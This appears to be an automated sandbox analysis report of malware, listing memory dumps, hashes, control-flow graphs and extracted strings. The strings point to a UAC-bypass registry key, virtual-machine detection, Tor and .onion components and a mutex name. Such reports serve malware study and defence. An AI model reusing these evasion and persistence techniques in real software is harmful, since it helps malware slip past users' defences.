                                                                                            • String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
                                                                                            • API String ID: 0-2845907608
                                                                                            • Opcode ID: 5abccb9955bb7e61ea68e392401cb810dba1d0244b6c3c0f14204fc9a1a2f5da
                                                                                            • Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
                                                                                            • Opcode Fuzzy Hash: 5abccb9955bb7e61ea68e392401cb810dba1d0244b6c3c0f14204fc9a1a2f5da
                                                                                            • Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000001.1462803885.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00401000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_1_401000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l
                                                                                            • String ID:
                                                                                            • API String ID: 2858943917-0
                                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                            • Instruction ID: 69757e266c5be84ff215eaaf3f6b84d50e1e16f6177c8bd8507655aba2af1ece
                                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                            • Instruction Fuzzy Hash: 6A117E3200464EBBCF165E84CC41CEF3F22FB19354B188526FA1868170D23AC9B1AF85

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                            • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                            • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                            • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000002.1587040107.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000840000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000C77000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000C7A000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CCF000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CD3000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CEF000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CF6000.00000040.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_2_400000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                                                                                            • API String ID: 0-3530339137
                                                                                            • Opcode ID: 8b027008e4681ae371e7009484516bb6ae8be36b8b546ccf354ab389333accda
                                                                                            • Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
                                                                                            • Opcode Fuzzy Hash: 8b027008e4681ae371e7009484516bb6ae8be36b8b546ccf354ab389333accda
                                                                                            • Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A

                                                                                            Execution Graph

                                                                                            Execution Coverage:2.4%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:823
                                                                                            Total number of Limit Nodes:2

                                                                                            Callgraph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Opacity -> Relevance
                                                                                            • Disassembly available

Control-flow Graph
APIs
• NtCloseObjectAuditAlarm.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
Memory Dump Source
• Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
Similarity
• API ID: AlarmAuditCloseObject
• String ID:
• API String ID: 2871759311-0
• Opcode ID: f55b75a42ba742ff66446f778846a6b7bb42d2851d26ad5f09de16630c5a37b5
• Instruction ID: e01ed9b63ef7c5920134c4e85c14ad27842d35840c28d74b04fb6c154e59ead0
• Opcode Fuzzy Hash: f55b75a42ba742ff66446f778846a6b7bb42d2851d26ad5f09de16630c5a37b5
• Instruction Fuzzy Hash: 6CF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB80

Control-flow Graph (basic-block node and edge list; the rendered graph and its executed/not-executed colouring are not recoverable):
control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 323 140002953-14000297b call 1400014c7 316->323 324 140002864-140002873 316->324 318->316 319 140002780-140002787 318->319 321 140002789-140002792 319->321 322 140002750-140002752 319->322 326 140002794-1400027ab 321->326 327 1400027f8-1400027fb 321->327 325 14000275a-14000276e 322->325 339 140002986-1400029c8 call 140001503 call 140005aa0 323->339 340 14000297d 323->340 329 140002eb7-140002ef4 call 140001370 324->329 330 140002879-140002888 324->330 325->316 325->318 333 1400027f5 326->333 334 1400027ad-1400027c2 326->334 327->325 331 1400028e4-14000294e wcsncmp call 1400014e5 330->331 332 14000288a-1400028dd 330->332 331->323 332->331 333->327 338 1400027d0-1400027d7 334->338 342 1400027d9-1400027f3 338->342 343 140002800-140002809 338->343 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342->333 342->338 343->325 353 1400029d7-140002a0c 349->353 358 140002e8a 349->358 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 354 140002a45-140002a76 wcslen 352->354 355 140002a78-140002aa5 352->355 353->352 357 140002aa8-140002abf wcslen 354->357 355->357 359 140002ac5-140002ad8 357->359 360 140002e8f-140002eab call 140001370 357->360 358->352 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->329 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
APIs
Strings
Memory Dump Source
• Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
Similarity
• API ID: wcslen$wcscatwcscpywcsncmp
• String ID: 0$X$\BaseNamedObjects\jcainqxqkscdpovyplwhuwda$`
• API String ID: 597572034-3841223293
• Opcode ID: a676fb25aaeee3b6604def02b718d9e949d38b37f356ca86444c62d74241b377
• Instruction ID: 28cfe78a8aee8444162dbcc10a1834099572682b5c384cadc97ca8a34bdfeb30
• Opcode Fuzzy Hash: a676fb25aaeee3b6604def02b718d9e949d38b37f356ca86444c62d74241b377
• Instruction Fuzzy Hash: FF1258B2618BC081E762CB1AF8443EA77A4F789794F414215EBA957BF5EF78C189C700

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
Similarity
• API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
• String ID:
• API String ID: 2643109117-0
• Opcode ID: 5d0fc5cb5312a86aea69d86366c04c8dca501517c33cfb13c8926ddb1e835d98
• Instruction ID: 6da89aac2756394a8f90a5fb187dfef0bda678cff9b9221eeeed913521154361
• Opcode Fuzzy Hash: 5d0fc5cb5312a86aea69d86366c04c8dca501517c33cfb13c8926ddb1e835d98
• Instruction Fuzzy Hash: 3E5113B1601A4485FB16EF27F9947EA27A5AB8DBD0F449121FB4D873B6DE38C4958300

Control-flow Graph (basic-block node and edge list; the rendered graph and its executed/not-executed colouring are not recoverable):
control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 431 140001be9-140001bf1 428->431 430 140001c0c-140001c17 call 1400023b0 429->430 438 140001cf4-140001cfe call 140001d40 430->438 439 140001c1d-140001c6c call 1400024d0 VirtualQuery 430->439 432 140001bf3-140001c02 431->432 433 140001be0-140001be7 431->433 432->433 435 140001c04 432->435 433->430 433->431 437 140001cd7-140001cf3 memcpy 435->437 442 140001d03-140001d1e call 140001d40 438->442 439->442 445 140001c72-140001c79 439->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 452 140001cd1 447->452 453 140001c80-140001c83 447->453 449 140001ca4-140001ccf VirtualProtect 448->449 450 140001c99-140001c9c 448->450 449->446 449->452 450->452 454 140001c9e 450->454 452->437 453->452 456 140001c85-140001c8a 453->456 454->449 456->452 457 140001c8c 456->457 457->454
APIs
• VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
• VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
• memcpy.MSVCRT ref: 0000000140001CE0
• GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
Strings
Memory Dump Source
• Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
Similarity
• API ID: Virtual$ErrorLastProtectQuerymemcpy
• String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
• API String ID: 2595394609-2123141913
• Opcode ID: fa23354802fc419f721e8d6d99bf42313c076893da16dc773a4833f7a127173c
• Instruction ID: 983f2cd7954f52bd80517b4e6a6dcb45ec3260e26c9f0eed5b1464496079116d
• Opcode Fuzzy Hash: fa23354802fc419f721e8d6d99bf42313c076893da16dc773a4833f7a127173c
• Instruction Fuzzy Hash: 174143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700

Control-flow Graph (basic-block node and edge list; the rendered graph and its executed/not-executed colouring are not recoverable):
control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 467 14000214d-140002159 TlsGetValue GetLastError 462->467 465 140002241-140002263 DeleteCriticalSection 464->465 466 14000222f 464->466 465->463 468 140002230-14000223f 466->468 469 14000215b-14000215e 467->469 470 140002140-140002147 467->470 468->465 469->470 471 140002160-14000216d 469->471 470->461 470->467 471->470
APIs
Memory Dump Source
• Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
Similarity
• API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
• String ID:
• API String ID: 926137887-0
• Opcode ID: 45aa12ab29fc3c2d0ae3eee0e0c0ab33baf9409f5ce98155d9c2e1cd3bee0986
• Instruction ID: 666b5f77822bde30b86d89f839f8ae6682933cabf40eac71bda43f7e294fb4ad
• Opcode Fuzzy Hash: 45aa12ab29fc3c2d0ae3eee0e0c0ab33baf9409f5ce98155d9c2e1cd3bee0986
• Instruction Fuzzy Hash: B821E0B1715A0292FA5BEB53F9483E923A0B76CBD0F444021FB1E576B4DF7A8986C300

Control-flow Graph (basic-block node and edge list; the rendered graph and its executed/not-executed colouring are not recoverable):
control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 484 14000194d-140001954 482->484 485 14000191e-140001929 482->485 483->484 486 140001943-140001947 483->486 489 140001956-140001961 484->489 490 14000199e-1400019a6 484->490 485->484 487 14000192b-14000193a 485->487 486->484 488 140001a20-140001a26 486->488 487->483 492 140001b87-140001b98 call 140001d40 488->492 493 140001a2c-140001a37 488->493 494 140001970-14000199c call 140001ba0 489->494 490->476 491 1400019a8-1400019c1 490->491 495 1400019df-1400019e7 491->495 493->490 496 140001a3d-140001a5f 493->496 494->490 499 1400019e9-140001a0d VirtualProtect 495->499 500 1400019d0-1400019dd 495->500 501 140001a7d-140001a97 496->501 499->500 500->476 500->495 504 140001b74-140001b82 call 140001d40 501->504 505 140001a9d-140001afa 501->505 504->492 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->490 516->501 517->513 518->504
APIs
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
Strings
Memory Dump Source
• Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
• API String ID: 544645111-395989641
• Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
• Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
• Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
• Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

Control-flow Graph (basic-block node and edge list; the rendered graph and its executed/not-executed colouring are not recoverable):
control_flow_graph 522 14000219e-1400021a5 523 140002272-140002280 522->523 524 1400021ab-1400021c2 EnterCriticalSection 522->524 525 140002265-14000226c LeaveCriticalSection 524->525 526 1400021c8-1400021d6 524->526 525->523 527 1400021e9-1400021f5 TlsGetValue GetLastError 526->527 528 1400021f7-1400021fa 527->528 529 1400021e0-1400021e7 527->529 528->529 530 1400021fc-140002209 528->530 529->525 529->527 530->529
APIs
Memory Dump Source
• Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
Similarity
• API ID: CriticalSection$EnterErrorLastLeaveValue
• String ID:
• API String ID: 682475483-0
• Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
• Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
• Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
• Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200

Control-flow Graph (basic-block node and edge list; the rendered graph and its executed/not-executed colouring are not recoverable):
control_flow_graph 208 98bea1-98bec9 210 98becb 208->210 211 98bece-98c209 call 98b6dc 208->211 210->211 272 98c20e-98c215 211->272
Strings
Memory Dump Source
• Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_980000_powershell.jbxd
Similarity
• API ID:
• String ID: [Owr^$kKwr^$kOwr^${Kwr^${Owr^
• API String ID: 0-2370323555
• Opcode ID: 8cea6050339de13b8cd04615e90245b4ab5836b7510147dd0011a72f0deb9126
• Instruction ID: e887791d7aefb8b98ec427cbe67f90eb7f5fad0ff5b3be3aedeed5e7f55d823c
• Opcode Fuzzy Hash: 8cea6050339de13b8cd04615e90245b4ab5836b7510147dd0011a72f0deb9126
• Instruction Fuzzy Hash: F7915FB1B00718ABDB15EFB888115AE7BE3EF84B00F04892DD506AB750DF359E099BD5

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_980000_powershell.jbxd
Similarity
• API ID:
• String ID: [Owr^$kKwr^$kOwr^${Kwr^${Owr^
• API String ID: 0-2370323555

Strings
Memory Dump Source
• Source File: 00000029.00000002.1577568622.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_7020000_powershell.jbxd
Similarity
• API ID:
• String ID: pidk$pidk$pidk$pidk$pidk$|,fk
• API String ID: 0-2063428483

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000029.00000002.1584115539.0000000007F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_7f40000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000029.00000002.1584115539.0000000007F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_7f40000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_980000_powershell.jbxd
Similarity
• API ID:
• String ID: $wr^
• API String ID: 0-3864684656

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_980000_powershell.jbxd
Similarity
• API ID:
• String ID: U
• API String ID: 0-3372436214

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_980000_powershell.jbxd
Similarity
• API ID:
• String ID: $wr^
• API String ID: 0-3864684656

Control-flow Graph
Memory Dump Source
• Source File: 00000029.00000002.1577568622.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_7020000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
Memory Dump Source
• Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_980000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
Memory Dump Source
• Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_980000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
Memory Dump Source
• Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_980000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
Memory Dump Source
• Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_980000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000029.00000002.1577568622.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_7020000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                            • Opcode ID: f28e44ff0705100940981bf62c2f3ceb2ac953e10dfd5acdcddecdb08f05f98d
                                                                                            • Instruction ID: dcbc6c9cb2f69dba6b5ecdc87adff4dd22f9c9aa0b3c673528b45f9fb19efda1
                                                                                            • Opcode Fuzzy Hash: f28e44ff0705100940981bf62c2f3ceb2ac953e10dfd5acdcddecdb08f05f98d
                                                                                            • Instruction Fuzzy Hash: D74107B2B002A18FDBA08F148441B7A7BF2AF81210F1542AAE9049B355E731CC47DB67
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f3438f8615edb4f5cbad1eea24bc0dfb6ebda89894256ccfcb048b5319bead50
                                                                                            • Instruction ID: 2443cd07123e30c0b00e82ee397d26e3d20333c34bd879bfdb96c1fc9b80cc00
                                                                                            • Opcode Fuzzy Hash: f3438f8615edb4f5cbad1eea24bc0dfb6ebda89894256ccfcb048b5319bead50
                                                                                            • Instruction Fuzzy Hash: 11413E34B082048FDB15DFA4C494AADBBF6EF8E711F254498D446AB361DB35DC01CB65
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
